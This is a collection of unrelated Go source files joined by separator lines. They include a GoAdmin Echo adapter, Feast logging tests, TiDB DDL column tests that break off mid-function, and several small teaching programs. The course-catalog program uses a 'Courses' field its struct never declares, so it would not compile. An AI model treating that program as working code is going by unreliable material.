if db.ProdTbl.Dirty(cx, self, &db.Details, &db.Name, &db.Summary) {
if err := UpdateText(cx, self); err != nil {
return err
}
}
return nil
}
func (self *Prod) Init(cx *Cx) *Prod {
self.BasicRec.Init(godbase.NewUId())
return self
}
|
package main
import (
"html/template"
"log"
"os"
)
type course struct {
Number string
Name string
Units string
}
type semester struct {
Term string
}
type year struct {
AcaYear string
Fall semester
Spring semester
Summer semester
}
var tpl *template.Template
func init() {
tpl = template.Must(template.ParseGlob("src/*.gohtml"))
}
func main() {
years := []year{
year{
AcaYear: "2020-2021",
Fall: semester{
Term: "Fall",
Courses: []course{
course{"CSCI-40", "Introduction to Programming in Go", "4"},
course{"CSCI-130", "Introduction to Web Programming with Go", "4"},
course{"CSCI-140", "Mobile Apps Using Go", "4"},
},
},
Spring: semester{
Term: "Spring",
Courses: []course{
course{"CSCI-50", "Advanced Go", "5"},
course{"CSCI-190", "Advanced Web Programming with Go", "5"},
course{"CSCI-191", "Advanced Mobile Apps With Go", "5"},
},
},
},
year{
AcaYear: "2021-2022",
Fall: semester{
Term: "Fall",
Courses: []course{
course{"CSCI-40", "Introduction to Programming in Go", "4"},
course{"CSCI-130", "Introduction to Web Programming with Go", "4"},
course{"CSCI-140", "Mobile Apps Using Go", "4"},
},
},
Spring: semester{
Term: "Spring",
Courses: []course{
course{"CSCI-50", "Advanced Go", "5"},
course{"CSCI-190", "Advanced Web Programming with Go", "5"},
course{"CSCI-191", "Advanced Mobile Apps With Go", "5"},
},
},
},
}
err := tpl.ExecuteTemplate(os.Stdout, "tpl.gohtml", years)
if err != nil {
log.Fatalln(err)
}
}
|
package main //嵌入的反射
import (
"fmt"
"reflect"
)
type User struct {
Id int
Name string
Age int
}
type Manager struct {
User
title string
}
func main() {
m := Manager{User: User{1, "sh", 34}, title: "title"}
t := reflect.TypeOf(m)
fmt.Printf("%#v \n ", t.FieldByIndex([]int{0, 1})) //传slice 取匿名字段中的字段
}
|
package main
import "fmt"
type user struct {
id int
username string
firstname string
}
func main() {
users := &[]user{{
id: 1,
username: "a",
firstname: "aa",
},
{
id: 2,
username: "b",
firstname: "aa",
}, {
id: 3,
username: "c",
firstname: "cc",
},
{
id: 4,
username: "d",
firstname: "dd",
},
}
groupbyUsername(*users)
groupByCount(*users)
}
func groupbyUsername(users []user) {
group := make(map[string][]user)
for _, user := range users {
if v, exists := group[user.firstname]; exists {
v = append(v, user)
}
group[user.firstname] = append(group[user.firstname], user)
}
fmt.Println(group)
}
func groupByCount(users []user) {
group := make(map[string]int)
for _, user := range users {
group[user.firstname] += 1
}
fmt.Println(group)
}
|
package game
// Color is a Pixel struct
type Color struct {
R byte
G byte
B byte
}
// Pos describes the position
type Pos struct {
X float32
Y float32
}
// Ball represent the pong ball
type Ball struct {
Pos
Radius float32 // radius of the ball
XV float32 // X velocity
YV float32 // Y velocity
Color Color
}
// Paddle represents the pong paddle
type Paddle struct {
Pos
W float32 // Width
H float32 // Height
Color Color
Score int
}
|
// Copyright 2019 GoAdmin Core Team. All rights reserved.
// Use of this source code is governed by a Apache-2.0 style
// license that can be found in the LICENSE file.
package echo
import (
"bytes"
"errors"
"net/http"
"net/url"
"strings"
"github.com/GoAdminGroup/go-admin/adapter"
"github.com/GoAdminGroup/go-admin/context"
"github.com/GoAdminGroup/go-admin/engine"
"github.com/GoAdminGroup/go-admin/modules/config"
"github.com/GoAdminGroup/go-admin/plugins"
"github.com/GoAdminGroup/go-admin/plugins/admin/models"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/constant"
"github.com/GoAdminGroup/go-admin/template/types"
"github.com/labstack/echo/v4"
)
// Echo structure value is an Echo GoAdmin adapter.
type Echo struct {
adapter.BaseAdapter
ctx echo.Context
app *echo.Echo
}
func init() {
engine.Register(new(Echo))
}
// User implements the method Adapter.User.
func (e *Echo) User(ctx interface{}) (models.UserModel, bool) {
return e.GetUser(ctx, e)
}
// Use implements the method Adapter.Use.
func (e *Echo) Use(app interface{}, plugs []plugins.Plugin) error {
return e.GetUse(app, plugs, e)
}
// Content implements the method Adapter.Content.
func (e *Echo) Content(ctx interface{}, getPanelFn types.GetPanelFn, fn context.NodeProcessor, btns ...types.Button) {
e.GetContent(ctx, getPanelFn, e, btns, fn)
}
type HandlerFunc func(ctx echo.Context) (types.Panel, error)
func Content(handler HandlerFunc) echo.HandlerFunc {
return func(ctx echo.Context) error {
engine.Content(ctx, func(ctx interface{}) (types.Panel, error) {
return handler(ctx.(echo.Context))
})
return nil
}
}
// SetApp implements the method Adapter.SetApp.
func (e *Echo) SetApp(app interface{}) error {
var (
eng *echo.Echo
ok bool
)
if eng, ok = app.(*echo.Echo); !ok {
return errors.New("echo adapter SetApp: wrong parameter")
}
e.app = eng
return nil
}
// AddHandler implements the method Adapter.AddHandler.
func (e *Echo) AddHandler(method, path string, handlers context.Handlers) {
e.app.Add(strings.ToUpper(method), path, func(c echo.Context) error {
ctx := context.NewContext(c.Request())
for _, key := range c.ParamNames() {
if c.Request().URL.RawQuery == "" {
c.Request().URL.RawQuery += strings.ReplaceAll(key, ":", "") + "=" + c.Param(key)
} else {
c.Request().URL.RawQuery += "&" + strings.ReplaceAll(key, ":", "") + "=" + c.Param(key)
}
}
ctx.SetHandlers(handlers).Next()
for key, head := range ctx.Response.Header {
c.Response().Header().Set(key, head[0])
}
if ctx.Response.Body != nil {
buf := new(bytes.Buffer)
_, _ = buf.ReadFrom(ctx.Response.Body)
_ = c.String(ctx.Response.StatusCode, buf.String())
} else {
c.Response().WriteHeader(ctx.Response.StatusCode)
}
return nil
})
}
// Name implements the method Adapter.Name.
func (*Echo) Name() string {
return "echo"
}
// SetContext implements the method Adapter.SetContext.
func (*Echo) SetContext(contextInterface interface{}) adapter.WebFrameWork {
var (
ctx echo.Context
ok bool
)
if ctx, ok = contextInterface.(echo.Context); !ok {
panic("echo adapter SetContext: wrong parameter")
}
return &Echo{ctx: ctx}
}
// Redirect implements the method Adapter.Redirect.
func (e *Echo) Redirect() {
_ = e.ctx.Redirect(http.StatusFound, config.Url(config.GetLoginUrl()))
}
// SetContentType implements the method Adapter.SetContentType.
func (e *Echo) SetContentType() {
e.ctx.Response().Header().Set("Content-Type", e.HTMLContentType())
}
// Write implements the method Adapter.Write.
func (e *Echo) Write(body []byte) {
e.ctx.Response().WriteHeader(http.StatusOK)
_, _ = e.ctx.Response().Write(body)
}
// GetCookie implements the method Adapter.GetCookie.
func (e *Echo) GetCookie() (string, error) {
cookie, err := e.ctx.Cookie(e.CookieKey())
if err != nil {
return "", err
}
return cookie.Value, err
}
// Lang implements the method Adapter.Lang.
func (e *Echo) Lang() string {
return e.ctx.Request().URL.Query().Get("__ga_lang")
}
// Path implements the method Adapter.Path.
func (e *Echo) Path() string {
return e.ctx.Request().URL.Path
}
// Method implements the method Adapter.Method.
func (e *Echo) Method() string {
return e.ctx.Request().Method
}
// FormParam implements the method Adapter.FormParam.
func (e *Echo) FormParam() url.Values {
_ = e.ctx.Request().ParseMultipartForm(32 << 20)
return e.ctx.Request().PostForm
}
// IsPjax implements the method Adapter.IsPjax.
func (e *Echo) IsPjax() bool {
return e.ctx.Request().Header.Get(constant.PjaxHeader) == "true"
}
// Query implements the method Adapter.Query.
func (e *Echo) Query() url.Values {
return e.ctx.Request().URL.Query()
}
|
package types
// Type is a placeholder for a pointer to any other type in this package.
type Type interface{}
// Docs represents documentation text attached to other types.
type Docs struct {
Text string
}
// Field represents a function argument or return value.
// Docs and name are optional.
type Field struct {
Name string
Docs Docs
Type string
}
// Function represents a function type.
// Docs, arguments and return values are optional.
type Function struct {
Name string
Docs Docs
Arguments []Field
ReturnValues []Field
}
// Reference represents a reference to another value.
// Docs and package are optional.
type Reference struct {
Package string
Name string
Docs Docs
}
// Interface represents an interface type.
// Docs, embedded and methods are optional.
type Interface struct {
Name string
Docs Docs
Embedded []Reference
Methods []Function
}
// Value represents a const or var declaration.
// Docs and const are optional. Exactly one of type or value should be specified.
type Value struct {
Name string
Docs Docs
Const bool
Type string
Value string
}
|
package logging
import (
"context"
"io/ioutil"
"path/filepath"
"testing"
"time"
"github.com/apache/arrow/go/v8/arrow"
"github.com/apache/arrow/go/v8/arrow/array"
"github.com/apache/arrow/go/v8/arrow/memory"
"github.com/apache/arrow/go/v8/parquet/file"
"github.com/apache/arrow/go/v8/parquet/pqarrow"
"github.com/stretchr/testify/require"
"github.com/feast-dev/feast/go/protos/feast/types"
"github.com/stretchr/testify/assert"
"google.golang.org/protobuf/types/known/timestamppb"
"github.com/feast-dev/feast/go/protos/feast/serving"
)
type DummySink struct{}
func (s *DummySink) Write(recs []arrow.Record) error {
return nil
}
func (s *DummySink) Flush(featureServiceName string) error {
return nil
}
func TestLoggingChannelTimeout(t *testing.T) {
config := LoggerConfig{
SampleRate: 1.0,
LoggingOptions: LoggingOptions{
ChannelCapacity: 1,
EmitTimeout: DefaultOptions.EmitTimeout,
FlushInterval: DefaultOptions.FlushInterval,
WriteInterval: DefaultOptions.WriteInterval,
},
}
logger, err := NewLogger(&FeatureServiceSchema{}, "testFS", &DummySink{}, config)
// stop log processing to check buffering channel
logger.Stop()
logger.WaitUntilStopped()
assert.Nil(t, err)
assert.Empty(t, logger.buffer.logs)
ts := timestamppb.New(time.Now())
newLog := Log{
FeatureStatuses: []serving.FieldStatus{serving.FieldStatus_PRESENT},
EventTimestamps: []*timestamppb.Timestamp{ts, ts},
}
err = logger.EmitLog(&newLog)
assert.Nil(t, err)
newLog2 := Log{
FeatureStatuses: []serving.FieldStatus{serving.FieldStatus_PRESENT},
EventTimestamps: []*timestamppb.Timestamp{ts, ts},
}
err = logger.EmitLog(&newLog2)
// The channel times out and doesn't hang.
assert.NotNil(t, err)
}
func TestLogAndFlushToFile(t *testing.T) {
sink, err := NewFileLogSink(t.TempDir())
assert.Nil(t, err)
schema := &FeatureServiceSchema{
JoinKeys: []string{"driver_id"},
Features: []string{"view__feature"},
JoinKeysTypes: map[string]types.ValueType_Enum{"driver_id": types.ValueType_INT32},
FeaturesTypes: map[string]types.ValueType_Enum{"view__feature": types.ValueType_DOUBLE},
}
config := LoggerConfig{
SampleRate: 1.0,
LoggingOptions: LoggingOptions{
ChannelCapacity: DefaultOptions.ChannelCapacity,
EmitTimeout: DefaultOptions.EmitTimeout,
FlushInterval: DefaultOptions.FlushInterval,
WriteInterval: 10 * time.Millisecond,
},
}
logger, err := NewLogger(schema, "testFS", sink, config)
assert.Nil(t, err)
assert.Nil(t, logger.Log(
map[string]*types.RepeatedValue{
"driver_id": {
Val: []*types.Value{
{
Val: &types.Value_Int32Val{
Int32Val: 111,
},
},
},
},
},
[]*serving.GetOnlineFeaturesResponse_FeatureVector{
{
Values: []*types.Value{{Val: &types.Value_DoubleVal{DoubleVal: 2.0}}},
Statuses: []serving.FieldStatus{serving.FieldStatus_PRESENT},
EventTimestamps: []*timestamppb.Timestamp{timestamppb.Now()},
},
},
[]string{"view__feature"},
map[string]*types.RepeatedValue{},
"req-id",
))
require.Eventually(t, func() bool {
files, _ := ioutil.ReadDir(sink.path)
return len(files) > 0
}, 60*time.Second, 100*time.Millisecond)
files, _ := ioutil.ReadDir(sink.path)
pf, err := file.OpenParquetFile(filepath.Join(sink.path, files[0].Name()), false)
assert.Nil(t, err)
reader, err := pqarrow.NewFileReader(pf, pqarrow.ArrowReadProperties{}, memory.DefaultAllocator)
assert.Nil(t, err)
tbl, err := reader.ReadTable(context.Background())
assert.Nil(t, err)
tr := array.NewTableReader(tbl, -1)
defer tbl.Release()
fieldNameToIdx := make(map[string]int)
for idx, field := range tbl.Schema().Fields() {
fieldNameToIdx[field.Name] = idx
}
tr.Next()
rec := tr.Record()
assert.Equal(t, "req-id", rec.Column(fieldNameToIdx[LOG_REQUEST_ID_FIELD]).(*array.String).Value(0))
assert.EqualValues(t, 111, rec.Column(fieldNameToIdx["driver_id"]).(*array.Int32).Value(0))
assert.EqualValues(t, 2.0, rec.Column(fieldNameToIdx["view__feature"]).(*array.Float64).Value(0))
assert.EqualValues(t, serving.FieldStatus_PRESENT, rec.Column(fieldNameToIdx["view__feature__status"]).(*array.Int32).Value(0))
}
|
package semver
import "fmt"
type Version struct {
Major int
Minor int
Patch int
PreRelease string
BuildMeta string
}
func NewSemVer(major, minor, patch int, pre, build string) *Version {
return &Version{
Major: major,
Minor: minor,
Patch: patch,
PreRelease: pre,
BuildMeta: build,
}
}
func (v Version) String() string {
if v.PreRelease != "" && v.PreRelease[:1] != "-" {
v.PreRelease = "-" + v.PreRelease
}
if v.BuildMeta != "" && v.BuildMeta[:1] != "+" {
v.BuildMeta = "+" + v.BuildMeta
}
return fmt.Sprintf("%d.%d.%d%s%s",
v.Major, v.Minor, v.Patch, v.PreRelease, v.BuildMeta)
}
|
// Copyright 2022 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package ddl_test
import (
"context"
"fmt"
"math/rand"
"strconv"
"strings"
"testing"
"time"
"github.com/pingcap/errors"
testddlutil "github.com/pingcap/tidb/ddl/testutil"
"github.com/pingcap/tidb/ddl/util/callback"
"github.com/pingcap/tidb/domain"
"github.com/pingcap/tidb/errno"
"github.com/pingcap/tidb/kv"
"github.com/pingcap/tidb/parser/ast"
"github.com/pingcap/tidb/parser/model"
"github.com/pingcap/tidb/parser/mysql"
"github.com/pingcap/tidb/sessiontxn"
"github.com/pingcap/tidb/store/mockstore"
"github.com/pingcap/tidb/table"
"github.com/pingcap/tidb/table/tables"
"github.com/pingcap/tidb/testkit"
"github.com/pingcap/tidb/testkit/external"
"github.com/pingcap/tidb/types"
"github.com/pingcap/tidb/util/mock"
"github.com/stretchr/testify/require"
)
const columnModifyLease = 600 * time.Millisecond
func TestAddAndDropColumn(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
tk.MustExec("create table t2 (c1 int, c2 int, c3 int)")
tk.MustExec("set @@tidb_disable_txn_auto_retry = 0")
// ==========
// ADD COLUMN
// ==========
done := make(chan error, 1)
num := defaultBatchSize + 10
// add some rows
batchInsert(tk, "t2", 0, num)
testddlutil.SessionExecInGoroutine(store, "test", "alter table t2 add column c4 int default -1", done)
ticker := time.NewTicker(columnModifyLease / 2)
defer ticker.Stop()
step := 10
AddLoop:
for {
select {
case err := <-done:
if err == nil {
break AddLoop
}
require.NoError(t, err)
case <-ticker.C:
// delete some rows, and add some data
for i := num; i < num+step; i++ {
n := rand.Intn(num)
tk.MustExec("begin")
tk.MustExec("delete from t2 where c1 = ?", n)
tk.MustExec("commit")
// Make sure that statement of insert and show use the same infoSchema.
tk.MustExec("begin")
err := tk.ExecToErr("insert into t2 values (?, ?, ?)", i, i, i)
if err != nil {
// if err is failed, the column number must be 4 now.
values := tk.MustQuery("show columns from t2").Rows()
require.Len(t, values, 4)
}
tk.MustExec("commit")
}
num += step
}
}
// add data, here c4 must exist
for i := num; i < num+step; i++ {
tk.MustExec("insert into t2 values (?, ?, ?, ?)", i, i, i, i)
}
rows := tk.MustQuery("select count(c4) from t2").Rows()
require.Len(t, rows, 1)
require.Len(t, rows[0], 1)
count, err := strconv.ParseInt(rows[0][0].(string), 10, 64)
require.NoError(t, err)
require.Greater(t, count, int64(0))
tk.MustQuery("select count(c4) from t2 where c4 = -1").Check([][]interface{}{
{fmt.Sprintf("%v", count-int64(step))},
})
for i := num; i < num+step; i++ {
tk.MustQuery("select c4 from t2 where c4 = ?", i).Check([][]interface{}{
{fmt.Sprintf("%v", i)},
})
}
tbl := external.GetTableByName(t, tk, "test", "t2")
i := 0
j := 0
require.NoError(t, sessiontxn.NewTxn(context.Background(), tk.Session()))
defer func() {
if txn, err := tk.Session().Txn(true); err == nil {
require.NoError(t, txn.Rollback())
}
}()
err = tables.IterRecords(tbl, tk.Session(), tbl.Cols(),
func(_ kv.Handle, data []types.Datum, cols []*table.Column) (bool, error) {
i++
// c4 must be -1 or > 0
v, err := data[3].ToInt64(tk.Session().GetSessionVars().StmtCtx)
require.NoError(t, err)
if v == -1 {
j++
} else {
require.Greater(t, v, int64(0))
}
return true, nil
})
require.NoError(t, err)
require.Equal(t, int(count), i)
require.LessOrEqual(t, i, num+step)
require.Equal(t, int(count)-step, j)
// for modifying columns after adding columns
tk.MustExec("alter table t2 modify c4 int default 11")
for i := num + step; i < num+step+10; i++ {
tk.MustExec("insert into t2 values (?, ?, ?, ?)", i, i, i, i)
}
tk.MustQuery("select count(c4) from t2 where c4 = -1").Check([][]interface{}{
{fmt.Sprintf("%v", count-int64(step))},
})
// add timestamp type column
tk.MustExec("create table test_on_update_c (c1 int, c2 timestamp);")
defer tk.MustExec("drop table test_on_update_c;")
tk.MustExec("alter table test_on_update_c add column c3 timestamp null default '2017-02-11' on update current_timestamp;")
is := domain.GetDomain(tk.Session()).InfoSchema()
tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("test_on_update_c"))
require.NoError(t, err)
tblInfo := tbl.Meta()
colC := tblInfo.Columns[2]
require.Equal(t, mysql.TypeTimestamp, colC.GetType())
require.False(t, mysql.HasNotNullFlag(colC.GetFlag()))
// add datetime type column
tk.MustExec("create table test_on_update_d (c1 int, c2 datetime);")
tk.MustExec("alter table test_on_update_d add column c3 datetime on update current_timestamp;")
is = domain.GetDomain(tk.Session()).InfoSchema()
tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("test_on_update_d"))
require.NoError(t, err)
tblInfo = tbl.Meta()
colC = tblInfo.Columns[2]
require.Equal(t, mysql.TypeDatetime, colC.GetType())
require.False(t, mysql.HasNotNullFlag(colC.GetFlag()))
// add year type column
tk.MustExec("create table test_on_update_e (c1 int);")
defer tk.MustExec("drop table test_on_update_e;")
tk.MustExec("insert into test_on_update_e (c1) values (0);")
tk.MustExec("alter table test_on_update_e add column c2 year not null;")
tk.MustQuery("select c2 from test_on_update_e").Check(testkit.Rows("0"))
// test add unsupported constraint
tk.MustExec("create table t_add_unsupported_constraint (a int);")
err = tk.ExecToErr("ALTER TABLE t_add_unsupported_constraint ADD id int AUTO_INCREMENT;")
require.EqualError(t, err, "[ddl:8200]unsupported add column 'id' constraint AUTO_INCREMENT when altering 'test.t_add_unsupported_constraint'")
err = tk.ExecToErr("ALTER TABLE t_add_unsupported_constraint ADD id int KEY;")
require.EqualError(t, err, "[ddl:8200]unsupported add column 'id' constraint PRIMARY KEY when altering 'test.t_add_unsupported_constraint'")
err = tk.ExecToErr("ALTER TABLE t_add_unsupported_constraint ADD id int UNIQUE;")
require.EqualError(t, err, "[ddl:8200]unsupported add column 'id' constraint UNIQUE KEY when altering 'test.t_add_unsupported_constraint'")
// ===========
// DROP COLUMN
// ===========
done = make(chan error, 1)
tk.MustExec("delete from t2")
num = 100
// add some rows
for i := 0; i < num; i++ {
tk.MustExec("insert into t2 values (?, ?, ?, ?)", i, i, i, i)
}
// get c4 column id
testddlutil.SessionExecInGoroutine(store, "test", "alter table t2 drop column c4", done)
ticker = time.NewTicker(columnModifyLease / 2)
defer ticker.Stop()
step = 10
DropLoop:
for {
select {
case err := <-done:
if err == nil {
break DropLoop
}
require.NoError(t, err)
case <-ticker.C:
// delete some rows, and add some data
for i := num; i < num+step; i++ {
// Make sure that statement of insert and show use the same infoSchema.
tk.MustExec("begin")
err := tk.ExecToErr("insert into t2 values (?, ?, ?)", i, i, i)
if err != nil {
// If executing is failed, the column number must be 4 now.
values := tk.MustQuery("show columns from t2").Rows()
require.Len(t, values, 4)
}
tk.MustExec("commit")
}
num += step
}
}
// add data, here c4 must not exist
for i := num; i < num+step; i++ {
tk.MustExec("insert into t2 values (?, ?, ?)", i, i, i)
}
rows = tk.MustQuery("select count(*) from t2").Rows()
require.Len(t, rows, 1)
require.Len(t, rows[0], 1)
count, err = strconv.ParseInt(rows[0][0].(string), 10, 64)
require.NoError(t, err)
require.Greater(t, count, int64(0))
}
// TestDropColumn is for inserting value with a to-be-dropped column when do drop column.
// Column info from schema in build-insert-plan should be public only,
// otherwise they will not be consisted with Table.Col(), then the server will panic.
func TestDropColumn(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
num := 25
multiDDL := make([]string, 0, num)
sql := "create table t2 (c1 int, c2 int, c3 int, "
for i := 4; i < 4+num; i++ {
multiDDL = append(multiDDL, fmt.Sprintf("alter table t2 drop column c%d", i))
if i != 3+num {
sql += fmt.Sprintf("c%d int, ", i)
} else {
sql += fmt.Sprintf("c%d int)", i)
}
}
tk.MustExec(sql)
dmlDone := make(chan error, num)
ddlDone := make(chan error, num)
testddlutil.ExecMultiSQLInGoroutine(store, "test", multiDDL, ddlDone)
for i := 0; i < num; i++ {
testddlutil.ExecMultiSQLInGoroutine(store, "test", []string{"insert into t2 set c1 = 1, c2 = 1, c3 = 1, c4 = 1"}, dmlDone)
}
for i := 0; i < num; i++ {
err := <-ddlDone
require.NoError(t, err)
}
// Test for drop partition table column.
tk.MustExec("drop table if exists t1")
tk.MustExec("create table t1 (a int,b int) partition by hash(a) partitions 4;")
err := tk.ExecToErr("alter table t1 drop column a")
require.EqualError(t, err, "[ddl:3855]Column 'a' has a partitioning function dependency and cannot be dropped or renamed")
}
func TestChangeColumn(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease, mockstore.WithDDLChecker())
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
tk.MustExec("create table t3 (a int default '0', b varchar(10), d int not null default '0')")
tk.MustExec("insert into t3 set b = 'a'")
tk.MustQuery("select a from t3").Check(testkit.Rows("0"))
tk.MustExec("alter table t3 change a aa bigint")
tk.MustExec("insert into t3 set b = 'b'")
tk.MustQuery("select aa from t3").Check(testkit.Rows("0", "<nil>"))
// for no default flag
tk.MustExec("alter table t3 change d dd bigint not null")
is := domain.GetDomain(tk.Session()).InfoSchema()
tbl, err := is.TableByName(model.NewCIStr("test"), model.NewCIStr("t3"))
require.NoError(t, err)
tblInfo := tbl.Meta()
colD := tblInfo.Columns[2]
require.True(t, mysql.HasNoDefaultValueFlag(colD.GetFlag()))
// for the following definitions: 'not null', 'null', 'default value' and 'comment'
tk.MustExec("alter table t3 change b b varchar(20) null default 'c' comment 'my comment'")
is = domain.GetDomain(tk.Session()).InfoSchema()
tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("t3"))
require.NoError(t, err)
tblInfo = tbl.Meta()
colB := tblInfo.Columns[1]
require.Equal(t, "my comment", colB.Comment)
require.False(t, mysql.HasNotNullFlag(colB.GetFlag()))
tk.MustExec("insert into t3 set aa = 3, dd = 5")
tk.MustQuery("select b from t3").Check(testkit.Rows("a", "b", "c"))
// for timestamp
tk.MustExec("alter table t3 add column c timestamp not null")
tk.MustExec("alter table t3 change c c timestamp null default '2017-02-11' comment 'col c comment' on update current_timestamp")
is = domain.GetDomain(tk.Session()).InfoSchema()
tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("t3"))
require.NoError(t, err)
tblInfo = tbl.Meta()
colC := tblInfo.Columns[3]
require.Equal(t, "col c comment", colC.Comment)
require.False(t, mysql.HasNotNullFlag(colC.GetFlag()))
// for enum
tk.MustExec("alter table t3 add column en enum('a', 'b', 'c') not null default 'a'")
// https://github.com/pingcap/tidb/issues/23488
// if there is a prefix index on the varchar column, then we can change it to text
tk.MustExec("drop table if exists t")
tk.MustExec("create table t (k char(10), v int, INDEX(k(7)));")
tk.MustExec("alter table t change column k k tinytext")
is = domain.GetDomain(tk.Session()).InfoSchema()
tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("t"))
require.NoError(t, err)
// for failing tests
sql := "alter table t3 change aa a bigint default ''"
tk.MustGetErrCode(sql, errno.ErrInvalidDefault)
sql = "alter table t3 change a testx.t3.aa bigint"
tk.MustGetErrCode(sql, errno.ErrWrongDBName)
sql = "alter table t3 change t.a aa bigint"
tk.MustGetErrCode(sql, errno.ErrWrongTableName)
tk.MustExec("create table t4 (c1 int, c2 int, c3 int default 1, index (c1));")
tk.MustExec("insert into t4(c2) values (null);")
err = tk.ExecToErr("alter table t4 change c1 a1 int not null;")
require.EqualError(t, err, "[ddl:1265]Data truncated for column 'a1' at row 1")
sql = "alter table t4 change c2 a bigint not null;"
tk.MustGetErrCode(sql, mysql.WarnDataTruncated)
sql = "alter table t3 modify en enum('a', 'z', 'b', 'c') not null default 'a'"
tk.MustExec(sql)
// Rename to an existing column.
tk.MustExec("alter table t3 add column a bigint")
sql = "alter table t3 change aa a bigint"
tk.MustGetErrCode(sql, errno.ErrDupFieldName)
// https://github.com/pingcap/tidb/issues/23488
tk.MustExec("drop table if exists t5")
tk.MustExec("create table t5 (k char(10) primary key, v int)")
sql = "alter table t5 change column k k tinytext;"
tk.MustGetErrCode(sql, mysql.ErrBlobKeyWithoutLength)
tk.MustExec("drop table t5")
tk.MustExec("drop table if exists t5")
tk.MustExec("create table t5 (k char(10), v int, INDEX(k))")
sql = "alter table t5 change column k k tinytext;"
tk.MustGetErrCode(sql, mysql.ErrBlobKeyWithoutLength)
tk.MustExec("drop table t5")
tk.MustExec("drop table t3")
}
func TestRenameColumn(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease, mockstore.WithDDLChecker())
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
assertColNames := func(tableName string, colNames ...string) {
cols := external.GetTableByName(t, tk, "test", tableName).Cols()
require.Equal(t, len(colNames), len(cols))
for i := range cols {
require.Equal(t, strings.ToLower(colNames[i]), cols[i].Name.L)
}
}
tk.MustExec("create table test_rename_column (id int not null primary key auto_increment, col1 int)")
tk.MustExec("alter table test_rename_column rename column col1 to col1")
assertColNames("test_rename_column", "id", "col1")
tk.MustExec("alter table test_rename_column rename column col1 to col2")
assertColNames("test_rename_column", "id", "col2")
// Test renaming non-exist columns.
tk.MustGetErrCode("alter table test_rename_column rename column non_exist_col to col3", errno.ErrBadField)
// Test renaming to an exist column.
tk.MustGetErrCode("alter table test_rename_column rename column col2 to id", errno.ErrDupFieldName)
// Test renaming generated columns.
tk.MustExec("drop table test_rename_column")
tk.MustExec("create table test_rename_column (id int, col1 int generated always as (id + 1))")
tk.MustExec("alter table test_rename_column rename column col1 to col2")
assertColNames("test_rename_column", "id", "col2")
tk.MustExec("alter table test_rename_column rename column col2 to col1")
assertColNames("test_rename_column", "id", "col1")
tk.MustGetErrCode("alter table test_rename_column rename column id to id1", errno.ErrDependentByGeneratedColumn)
// Test renaming view columns.
tk.MustExec("drop table test_rename_column")
tk.MustExec("create table test_rename_column (id int, col1 int)")
tk.MustExec("create view test_rename_column_view as select * from test_rename_column")
tk.MustExec("alter table test_rename_column rename column col1 to col2")
tk.MustGetErrCode("select * from test_rename_column_view", errno.ErrViewInvalid)
tk.MustExec("drop view test_rename_column_view")
tk.MustExec("drop table test_rename_column")
// Test rename a non-exists column. See https://github.com/pingcap/tidb/issues/34811.
tk.MustExec("drop table if exists t;")
tk.MustExec("create table t (a int);")
tk.MustGetErrCode("alter table t rename column b to b;", errno.ErrBadField)
}
func TestVirtualColumnDDL(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
tk.MustExec(`create global temporary table test_gv_ddl(a int, b int as (a+8) virtual, c int as (b + 2) stored) on commit delete rows;`)
is := sessiontxn.GetTxnManager(tk.Session()).GetTxnInfoSchema()
tbl, err := is.TableByName(model.NewCIStr("test"), model.NewCIStr("test_gv_ddl"))
require.NoError(t, err)
testCases := []struct {
generatedExprString string
generatedStored bool
}{
{"", false},
{"`a` + 8", false},
{"`b` + 2", true},
}
for i, column := range tbl.Meta().Columns {
require.Equal(t, testCases[i].generatedExprString, column.GeneratedExprString)
require.Equal(t, testCases[i].generatedStored, column.GeneratedStored)
}
result := tk.MustQuery(`DESC test_gv_ddl`)
result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
tk.MustExec("begin;")
tk.MustExec("insert into test_gv_ddl values (1, default, default)")
tk.MustQuery("select * from test_gv_ddl").Check(testkit.Rows("1 9 11"))
tk.MustExec("commit")
// for local temporary table
tk.MustExec(`create temporary table test_local_gv_ddl(a int, b int as (a+8) virtual, c int as (b + 2) stored);`)
is = sessiontxn.GetTxnManager(tk.Session()).GetTxnInfoSchema()
tbl, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("test_local_gv_ddl"))
require.NoError(t, err)
for i, column := range tbl.Meta().Columns {
require.Equal(t, testCases[i].generatedExprString, column.GeneratedExprString)
require.Equal(t, testCases[i].generatedStored, column.GeneratedStored)
}
result = tk.MustQuery(`DESC test_local_gv_ddl`)
result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
tk.MustExec("begin;")
tk.MustExec("insert into test_local_gv_ddl values (1, default, default)")
tk.MustQuery("select * from test_local_gv_ddl").Check(testkit.Rows("1 9 11"))
tk.MustExec("commit")
tk.MustQuery("select * from test_local_gv_ddl").Check(testkit.Rows("1 9 11"))
}
func TestGeneratedColumnDDL(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
